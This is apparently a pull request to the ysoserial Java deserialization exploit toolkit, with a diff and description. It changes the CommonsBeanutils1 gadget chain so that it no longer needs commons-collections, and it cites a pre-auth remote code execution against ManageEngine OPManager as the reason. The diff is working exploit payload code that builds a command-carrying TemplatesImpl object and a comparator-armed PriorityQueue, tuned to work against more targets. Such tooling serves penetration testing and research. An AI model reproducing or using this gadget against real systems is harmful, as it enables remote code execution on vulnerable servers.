### PR TITLE
Remove a dependency for CommonsBeanutils1

### DIFF
--- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
+++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java
@@ -1,6 +1,7 @@
 package ysoserial.payloads;
 
 import java.math.BigInteger;
+import java.util.Collections;
 import java.util.PriorityQueue;
 
 import org.apache.commons.beanutils.BeanComparator;
@@ -12,14 +13,14 @@ import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
 @SuppressWarnings({ "rawtypes", "unchecked" })
-@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
+@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-logging:commons-logging:1.2"})
 @Authors({ Authors.FROHOFF })
 public class CommonsBeanutils1 implements ObjectPayload<Object> {
 
 	public Object getObject(final String command) throws Exception {
 		final Object templates = Gadgets.createTemplatesImpl(command);
 		// mock method name until armed
-		final BeanComparator comparator = new BeanComparator("lowestSetBit");
+		final BeanComparator comparator = new BeanComparator("lowestSetBit", Collections.reverseOrder());
 
 		// create queue with numbers and basic comparator
 		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);


### PR DESCRIPTION
This updates the `CommonsBeanutils` gadget to use the overloaded constructor with the `java.util.Collections.ReverseComparator` native Java comparator. This effectively removes the dependency on the commons-collections library thus allowing this gadget to be used in more scenarios.

This is called out in the blog [Pre-Auth RCE in ManageEngine OPManager](https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/) as being a necessary change to exploit the vulnerability. Given that the dependency is removed and not replaced, it seems like an ideal improvement.

If for whatever reason this should be implemented as an entirely new gadget, just let me know and I'll switch it over.